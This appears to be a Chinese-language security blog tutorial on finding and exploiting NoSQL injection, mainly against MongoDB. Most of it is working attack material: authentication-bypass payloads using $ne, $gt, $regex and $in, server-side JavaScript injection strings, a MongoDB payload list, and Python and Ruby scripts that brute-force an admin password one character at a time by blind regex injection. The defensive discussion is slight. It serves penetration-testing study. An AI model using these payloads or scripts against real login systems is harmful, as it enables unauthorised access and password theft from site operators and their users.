什么是NoSQL注入 | 如何挖掘、利用NoSQL注入漏洞
作者:FancyPig | 发布时间: | 更新时间:
相关阅读
data-postsbox="{"id":32869,"title":"失效的对象级授权 (BOLA) 概念解析 | OWASP API TOP 1","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2023/02/20230222022155506.jpg","cover_video":"https://v.pigsec.cn/Broken%20Object%20Level%20Authorization%20%28BOLA%29%20Explained_ts.m3u8","views":1282,"comment_count":0,"category":"cybersecurity","is_forum_post":false}">{"id":32869,"title":"失效的对象级授权 (BOLA) 概念解析 | OWASP API TOP 1","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2023/02/20230222022155506.jpg","cover_video":"https://v.pigsec.cn/Broken%20Object%20Level%20Authorization%20%28BOLA%29%20Explained_ts.m3u8","views":1282,"comment_count":0,"category":"cybersecurity","is_forum_post":false}
data-postsbox="{"id":32142,"title":"什么是SSRF漏洞 | 如何寻找和利用SSRF漏洞","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2023/02/20230212030457710.jpg","cover_video":"https://v.pigsec.cn/Find%20and%20Exploit%20Server-Side%20Request%20Forgery%20%28SSRF%29_ts.m3u8","views":2499,"comment_count":2,"category":"cybersecurity","is_forum_post":false}">{"id":32142,"title":"什么是SSRF漏洞 | 如何寻找和利用SSRF漏洞","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2023/02/20230212030457710.jpg","cover_video":"https://v.pigsec.cn/Find%20and%20Exploit%20Server-Side%20Request%20Forgery%20%28SSRF%29_ts.m3u8","views":2499,"comment_count":2,"category":"cybersecurity","is_forum_post":false}
视频讲解
本期视频将介绍什么是NoSQL以及如何使用它进行渗透测试。NoSQL是一种非关系型数据库,可以存储和查询数据,并不受传统数据库结构的约束。通过示例,我们将你展示如何使用MongoDB进行基础操作,例如创建数据库、集合和查询数据。最后,本期视频将提供一个NoSQL注入挑战,演示如何绕过NoSQL数据库的认证,帮助你更好地理解这一概念。
NoSQL注入
相比传统的SQL数据库,NoSQL数据库提供了更宽松的一致性限制。由于需要较少的关系约束和一致性检查,NoSQL数据库通常提供了更好的性能和扩展性。但是,即使不使用传统的SQL语法,这些数据库仍然可能受到注入攻击的威胁。
相关工具
- NoSQLmap - 自动化NoSQL数据库枚举和Web应用程序利用工具
- nosqlilab - 用于进行NoSQL注入演练的实验室
- Burp-NoSQLiScanner - 可在burpsuite中使用的插件
漏洞利用
身份验证绕过
基本身份验证绕过,使用不等于 ($ne) 或者大于 ($gt)
DATA数据格式
username[$ne]=toto&password[$ne]=toto
login[$regex]=a.*&pass[$ne]=lol
login[$gt]=admin&login[$lt]=test&pass[$ne]=1
login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
JSON数据格式
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}提取长度信息
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}提取数据信息
在URL中
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp
username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*
在JSON中
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}用 in 提取数据
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}SSJI
';return 'a'=='a' && ''=='
";return 'a'=='a' && ''=='
0;return trueNoSQL盲注
使用JSON格式发送POST请求
python脚本
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
u="http://example.org/login"
headers={'content-type': 'application/json'}
while True:
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
if 'OK' in r.text or r.status_code == 302:
print("Found one more char : %s" % (password+c))
password += c使用URL编码发送POST请求
python脚本
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
u="http://example.org/login"
headers={'content-type': 'application/x-www-form-urlencoded'}
while True:
for c in string.printable:
if c not in ['*','+','.','?','|','&','$']:
payload='user=%s&pass[$regex]=^%s&remember=on' % (username, password + c)
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
if r.status_code == 302 and r.headers['Location'] == '/dashboard':
print("Found one more char : %s" % (password+c))
password += c使用GET请求
python脚本
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username='admin'
password=''
u='http://example.org/login'
while True:
for c in string.printable:
if c not in ['*','+','.','?','|', '#', '&', '$']:
payload=f"?username={username}&password[$regex]=^{password + c}"
r = requests.get(u + payload)
if 'Yeah' in r.text:
print(f"Found one more char : {password+c}")
password += cruby脚本
require 'httpx'
username = 'admin'
password = ''
url = 'http://example.org/login'
# CHARSET = (?!..?~).to_a # all ASCII printable characters
CHARSET = [*'0'..'9',*'a'..'z','-'] # alphanumeric + '-'
GET_EXCLUDE = ['*','+','.','?','|', '#', '&', '$']
session = HTTPX.plugin(:persistent)
while true
CHARSET.each do |c|
unless GET_EXCLUDE.include?(c)
payload = "?username=#{username}&password[$regex]=^#{password + c}"
res = session.get(url + payload)
if res.body.to_s.match?('Yeah')
puts "Found one more char : #{password + c}"
password += c
end
end
end
endMongoDB Payloads
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';return 'a'=='a' && ''=='
";return(true);var xyz='a
0;return true